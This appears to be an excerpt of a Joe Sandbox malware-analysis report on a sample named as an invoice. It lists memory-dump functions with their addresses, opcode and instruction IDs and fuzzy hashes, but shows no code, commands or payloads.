                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b37b2b32f17daac2a4ad99ee83f01dd62251ecb25d58512ab6121b07f33944e
                                            • Instruction ID: d80ba1cd1a495a134f809fff6a05696f5818274720f96aa7ab3b3b246331f3bc
                                            • Opcode Fuzzy Hash: 5b37b2b32f17daac2a4ad99ee83f01dd62251ecb25d58512ab6121b07f33944e
                                            • Instruction Fuzzy Hash: A631BC719182A88FEB02DFE5D9912EDBFB6AF46300F1484ABD058AF246C73849469B50
                                            Function 0AB26A70 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ac9895a3d5de184a52a76d6a7a023a7413f67d8c09cf92dbfa391181f0b9420
                                            • Instruction ID: b730b8d774745e373fd5835d82691952dc3a0c136fc8118abe545206853e333c
                                            • Opcode Fuzzy Hash: 4ac9895a3d5de184a52a76d6a7a023a7413f67d8c09cf92dbfa391181f0b9420
                                            • Instruction Fuzzy Hash: 88214871A013651FE712CF388C945FFBFB6EFC122071546AAE498D7281EE308E0687A1
                                            Function 0AB28512 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dda71684a1f81c613f6d57d619ecc384ce1fa35759532bb702b3c860adde85c2
                                            • Instruction ID: e2af02d5560a859d772c8fe3a355fa81b6b82124f2ff448f5784fa5e240392e3
                                            • Opcode Fuzzy Hash: dda71684a1f81c613f6d57d619ecc384ce1fa35759532bb702b3c860adde85c2
                                            • Instruction Fuzzy Hash: 593108347006059FD715DF89D890AAAF7F2EF88724F24C859D55A9B795CB32F802CB50
                                            Function 00CED4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137466320.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ced000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9253a633b88885f2d1abd939f2d82f0afc501a5478c3516547d6ab681fa05ae1
                                            • Instruction ID: 2e20c8dc21702cefd906091d1a86115f65828f8c087b54cc59f11480fc2202eb
                                            • Opcode Fuzzy Hash: 9253a633b88885f2d1abd939f2d82f0afc501a5478c3516547d6ab681fa05ae1
                                            • Instruction Fuzzy Hash: 0F2125B2504280EFDB05DF15D9C0B2ABF65FB98318F20C56DE90A0B256C336D956CBA2
                                            Function 00CED3D8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137466320.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ced000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4dd67a404a507c1f38352849fe8b3dd870b762311c9720a0d92c05df6c939a9
                                            • Instruction ID: dc0e6db45d4d621db953bdbc144ae93f522e3c060fe94f18c751692a0c9bf333
                                            • Opcode Fuzzy Hash: b4dd67a404a507c1f38352849fe8b3dd870b762311c9720a0d92c05df6c939a9
                                            • Instruction Fuzzy Hash: 95212876504384DFDB05DF15D9C0B26BF65FBA4324F20C16DE90B0B296C336E856CAA2
                                            Function 0AB2EAFC Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ac409a9b19899e533f5919a684398154942565a372799e39222c76dba42b2aa
                                            • Instruction ID: a9c1ea8e941235b8f19a5724306ff47d147d20506042df5ab4ee4c5f9f170226
                                            • Opcode Fuzzy Hash: 6ac409a9b19899e533f5919a684398154942565a372799e39222c76dba42b2aa
                                            • Instruction Fuzzy Hash: 52319CB0A05269CFDB50DFA5D855A9CBFB2FB89200F10859AF40AEB345DB309D85EF01
                                            Function 0AB26C44 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5261ad7f2e6e3d12e20f49b406f2667808c7dfc37b873477ef32f850090702e8
                                            • Instruction ID: 848f69cbcce90d8dd8c9000b030dd71d33b222a57b15f6dba986316cfab0490c
                                            • Opcode Fuzzy Hash: 5261ad7f2e6e3d12e20f49b406f2667808c7dfc37b873477ef32f850090702e8
                                            • Instruction Fuzzy Hash: 773104B5D01218DFEB20DF99D594BCDBBF1EB48714F24856AE408BB240C7B95845CFA4
                                            Function 00CFD01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137624084.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_cfd000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 31eeeecc86780149897fcbd60f461ddd49de06be3d6ae795ae7838680fa43317
                                            • Instruction ID: a0e0154facea3a51264345ed309337714c9ee0a3a810d505d1485b793c279435
                                            • Opcode Fuzzy Hash: 31eeeecc86780149897fcbd60f461ddd49de06be3d6ae795ae7838680fa43317
                                            • Instruction Fuzzy Hash: 42212275604308EFDB54DF14D9C0B26BB62FB84314F20C56DEA0A4B292CB7AD807CA62
                                            Function 00CFD1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137624084.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_cfd000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20c8b1674c1d4a28cd2e71f6b02c6c0d7e8f494a9c2876ae2d700886d218511d
                                            • Instruction ID: 2765123d1d04861afc617fa14877869849004a1d7197e561d92d198c28074dae
                                            • Opcode Fuzzy Hash: 20c8b1674c1d4a28cd2e71f6b02c6c0d7e8f494a9c2876ae2d700886d218511d
                                            • Instruction Fuzzy Hash: C1210475504208EFDB45DF14D9C0B36BBA6FB84314F20C5ADEA0A4B292C776DC46CAA2
                                            Function 0AB20A5C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ded7500402e6ee0ef4e12aa5e4b79dc04f441125c04c6ed5c50b19306925779
                                            • Instruction ID: d2398753073a2f4405bd47e2fba8f8230df2403191fb2a9bb699fc0b18b3966e
                                            • Opcode Fuzzy Hash: 3ded7500402e6ee0ef4e12aa5e4b79dc04f441125c04c6ed5c50b19306925779
                                            • Instruction Fuzzy Hash: 18210431600215DBDB14EF29E4846EEBBF2FF84310F14C56AE8195B250DB35E940DF90
                                            Function 0AB22068 Relevance: .1, Instructions: 67COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44584fa00e94153b6df445b043cd19f0f2c1246a082a09e820f4b3d0b80737e8
                                            • Instruction ID: db80ef1a0865438566f3052db285afc3ed64ec222e117310b35b68b0d4c09d3b
                                            • Opcode Fuzzy Hash: 44584fa00e94153b6df445b043cd19f0f2c1246a082a09e820f4b3d0b80737e8
                                            • Instruction Fuzzy Hash: F22110B1D0135A9FEB10CF9AD884ADEBBF4FB48310F24846AE518A7240D375A904CBA4
                                            Function 0AB24638 Relevance: .1, Instructions: 67COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3fb14c2e941632fde6bea6d2c6af987377d19ec24a07346d913f94dcef4c0599
                                            • Instruction ID: 00da7ca5cd5bfafcc49967a20b852311f806692b2b849de97b5901335778fc3f
                                            • Opcode Fuzzy Hash: 3fb14c2e941632fde6bea6d2c6af987377d19ec24a07346d913f94dcef4c0599
                                            • Instruction Fuzzy Hash: 3631C2B0D0121CDFEB20DF99C994B9EBBF5EB48714F64845AE408BB240C7B55845CF95
                                            Function 0AB20AAC Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f8241bc1e510a2880c0d123b024532ddbfdd4282f0d82ba41aed3721d8cd01e2
                                            • Instruction ID: e65212108a8964531deb4ecd649149aaca4f15048feae5103a373b74acf78c0c
                                            • Opcode Fuzzy Hash: f8241bc1e510a2880c0d123b024532ddbfdd4282f0d82ba41aed3721d8cd01e2
                                            • Instruction Fuzzy Hash: 6221F0B19013599FDB10CF9AD984ADEBBF4FB48310F24846EE919A7200D3B5A944CBA4
                                            Function 0AB2EB5C Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1f454047d37d2134ea0d9112b780ced8d1d58fbaa8ba70a1a4e8817ca0352de
                                            • Instruction ID: 5561cabaeaf9dd6e88a6528745157b7350788fc0a6ced143aef86c3dfaf8e17b
                                            • Opcode Fuzzy Hash: a1f454047d37d2134ea0d9112b780ced8d1d58fbaa8ba70a1a4e8817ca0352de
                                            • Instruction Fuzzy Hash: 37316D74A01229CFDB54DFA5D89499DBFB2FB88340F20855AE40AEB354DB309C85EF50
                                            Function 0AB28B90 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61ff5d89b58aa174b638b2effa4ab37f0aa824407695178dfa88ff95e9b4a2f7
                                            • Instruction ID: ed09c1ec4d59e77c255b29d9d551c438b86524b1069b706a03c72d045f06d458
                                            • Opcode Fuzzy Hash: 61ff5d89b58aa174b638b2effa4ab37f0aa824407695178dfa88ff95e9b4a2f7
                                            • Instruction Fuzzy Hash: 4D110331209164EFE725DA98D890A75B771EBC5350B2884DFD40E8B382C733AC03DBA1
                                            Function 0AB27D90 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0bb515a4dd0e52fc71914d509352aef6675b21f89853154ca4794ffe6bcf1e1
                                            • Instruction ID: 39bb663d0249de6de7422a347d40d7d60641cf6e6ddcbc496c322a9b2fdc39a7
                                            • Opcode Fuzzy Hash: f0bb515a4dd0e52fc71914d509352aef6675b21f89853154ca4794ffe6bcf1e1
                                            • Instruction Fuzzy Hash: A911CE71A05304AFEB05DBB4CD16BEE7BF5EB81100F1044EBE809D7341EA398E129761
                                            Function 0AB2CDCE Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5013c7b30a524deb4fda36e2900f325422c9c1403d36e64aef9ffe007ef910ce
                                            • Instruction ID: 19e52d4d858e25fe405e54f8aff31a940ca699407a5888aced0651a909a43164
                                            • Opcode Fuzzy Hash: 5013c7b30a524deb4fda36e2900f325422c9c1403d36e64aef9ffe007ef910ce
                                            • Instruction Fuzzy Hash: AF218E71D15254EFEB08CF65D4449EDBFB6BF8A344F0091AAE40D97250CB345949DF80
                                            Function 0AB2B4F8 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd498c4225db63a60c75e9b9d364b1e0976332de3c4562a9613c24ec0abfca6d
                                            • Instruction ID: a11ec29e45e49662a8f4c0c8f932b221790d99f5ea7a35a854bff9d26f68acf3
                                            • Opcode Fuzzy Hash: fd498c4225db63a60c75e9b9d364b1e0976332de3c4562a9613c24ec0abfca6d
                                            • Instruction Fuzzy Hash: FD21E970E042588BEB18DFEAC5556EEFBF6BF88300F14C02AD419AB358DB7459469B50
                                            Function 0AB244E6 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 78e1694646f86c4e6a5d1aae22ab63fc6a47917b67403478fb93432ed44d1c00
                                            • Instruction ID: 52f20ed61f0ada94af453086f7719c879639a3e2414557a2536df70b4014c8c7
                                            • Opcode Fuzzy Hash: 78e1694646f86c4e6a5d1aae22ab63fc6a47917b67403478fb93432ed44d1c00
                                            • Instruction Fuzzy Hash: 7611EFB1B012694FAB11DE798C554BFBBF6EFC5220715496AE419D3340EE309D029760
                                            Function 00CFD005 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137624084.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_cfd000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 468636a68e76377d6f159c2bbf0fe41ca4342e8cea40f43dbdec8059156e4ff6
                                            • Instruction ID: 3976e663573bce807cc7a081437bec8f52d4e9420b8f9ef1e3cc4ad1d08660d7
                                            • Opcode Fuzzy Hash: 468636a68e76377d6f159c2bbf0fe41ca4342e8cea40f43dbdec8059156e4ff6
                                            • Instruction Fuzzy Hash: B0218E755093C48FCB02CF20D990715BF72EB46314F28C5EAD9498B2A7C33A980ACB62
                                            Function 0AB24D18 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bddf53be9b76ab06a1c7ebbe6c207f3aa24c0122ee025c4475fe19b6fbfbfbde
                                            • Instruction ID: 2c817bd11fb161dcdef7b92d8bc5f371306234f1c26a39190584359484200348
                                            • Opcode Fuzzy Hash: bddf53be9b76ab06a1c7ebbe6c207f3aa24c0122ee025c4475fe19b6fbfbfbde
                                            • Instruction Fuzzy Hash: 0A217274A10908DFE704DF5AE285999BBF1FF8C310B6280D5E4489B6A5DB71DE51DB00
                                            Function 0AB2B4F7 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b584960145a6600cff28e69c3526feb054cae00444757a2a6ad2e31ae94dac70
                                            • Instruction ID: 4b5ed58b7ce74b782ca4b729019c9e040a5386aa5426d307f12a465dae8ea170
                                            • Opcode Fuzzy Hash: b584960145a6600cff28e69c3526feb054cae00444757a2a6ad2e31ae94dac70
                                            • Instruction Fuzzy Hash: 3B21E8B4E042588BEB08DFEAC5552EEFBF6BF88300F14C02AD419AB358DB7449469F40
                                            Function 0AB265B8 Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f63c70c4d2c4a1276f9c968e973e7a2f7cd2920382dd414012806097af6cf9c7
                                            • Instruction ID: 107198fc5125b1c513bc3cd9c83e60281bcb41d997cd50f7ef5b460ce3d61809
                                            • Opcode Fuzzy Hash: f63c70c4d2c4a1276f9c968e973e7a2f7cd2920382dd414012806097af6cf9c7
                                            • Instruction Fuzzy Hash: 80115E31B016198BDB54EBB998206EEB7F6EF99711F50007AC509E7344EF368D02CBA0
                                            Function 00CED3D3 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137466320.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ced000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                            • Instruction ID: 6336d2972f138a333b3db53e9dcca002648ae26e1ae60b22f2a0a0d71681bd85
                                            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                            • Instruction Fuzzy Hash: 5211D3B6504284DFCB15CF10D5C4B16BF71FBA4324F24C6A9D80A0B656C33AE956CBA1
                                            Function 00CED4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137466320.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ced000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                            • Instruction ID: 88bf4725fd884629ed037395f088333901938c87581da3519807ed248e26c1bf
                                            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                            • Instruction Fuzzy Hash: 0211E6B6504280CFCB15CF10D9C4B16BF71FB94318F24C6A9D84A0B656C33AD956CBA1
                                            Function 0AB268E4 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d72ebce52a5c85806ff2279709a733900bb86fab89af9c071a4b008e3f7cda81
                                            • Instruction ID: c461591d41b6b732c237359f8c34815efcb48a0e3c71ce93fbbeab050d7adbbd
                                            • Opcode Fuzzy Hash: d72ebce52a5c85806ff2279709a733900bb86fab89af9c071a4b008e3f7cda81
                                            • Instruction Fuzzy Hash: 732106B58043499FDB10CF9AD884ADEBBF4FB48320F10845AE919A7200C775A954CFA5
                                            Function 0AB23C60 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 310793a0858cc6b638b1fdd262dd3863ff876776e065d6855505debd5ecce8c5
                                            • Instruction ID: 96f89959880fe06d223ffcbc34b882ce9d958cb5f7f1bfd58a03d59110c01ddf
                                            • Opcode Fuzzy Hash: 310793a0858cc6b638b1fdd262dd3863ff876776e065d6855505debd5ecce8c5
                                            • Instruction Fuzzy Hash: 4C11E330608214EFE304EB99D40067977E6EBC8260B1444ABD50A9F389CB79AC03A790
                                            Function 0AB21E20 Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e307acaf3e8690173ac52197a7b14ef81e431dfbdc554ef7434a7ce9d1352f36
                                            • Instruction ID: 4af15634387215c959c8d495804ac49e6e95cc00b6df58d30ce6a34a37914aac
                                            • Opcode Fuzzy Hash: e307acaf3e8690173ac52197a7b14ef81e431dfbdc554ef7434a7ce9d1352f36
                                            • Instruction Fuzzy Hash: CE118271D00209EFEF19EF64E84869DBBB1EF44300F50419AE405BB360DB719940DF80
                                            Function 0AB23C70 Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4332f6678bc0633dcdd1740c01778f811797ac1aab1e7acb87f941fd958f5309
                                            • Instruction ID: 2faac5ddc48ae51d090b1bbe2fd0371cae14691226ceb6e07ecdd1b6e523024a
                                            • Opcode Fuzzy Hash: 4332f6678bc0633dcdd1740c01778f811797ac1aab1e7acb87f941fd958f5309
                                            • Instruction Fuzzy Hash: 0C11C830708214EFE714EB99D84057A77F6EBC8360B1444ABD50A9F389CF796C02A791
                                            Function 00CFD1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137624084.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_cfd000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                            • Instruction ID: 3092f12d9bb353e77839119ad71225b2ad661dba1e5e7341f21ae2a8acebded0
                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                            • Instruction Fuzzy Hash: C311D075504284DFCB05CF10C5C0B25FB72FB84314F24C6AED94A4B256C33AD84ACB92
                                            Function 0AB21E3A Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d264a2772a1f9e3f4e7cba2b6e241c1f6ea3542042d0aba9dc7021ac9f2b8b1
                                            • Instruction ID: d5a5312400053844e85109a6254e95974898a607cc9d47a8ded61afab0084398
                                            • Opcode Fuzzy Hash: 8d264a2772a1f9e3f4e7cba2b6e241c1f6ea3542042d0aba9dc7021ac9f2b8b1
                                            • Instruction Fuzzy Hash: 10115B31E11219EFEF19EB64E8486EDBBB2EF84300F10456AE506BB364DB755944DF80
                                            Function 0AB2C52C Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fdd9765fa59241c72f800d54deefae680af77f04ae6d3ee738d59cffd3c7e5b6
                                            • Instruction ID: ea616e68eb410d696d07184ef3358581d1d48b0921e1ad943e020003bc0d2e26
                                            • Opcode Fuzzy Hash: fdd9765fa59241c72f800d54deefae680af77f04ae6d3ee738d59cffd3c7e5b6
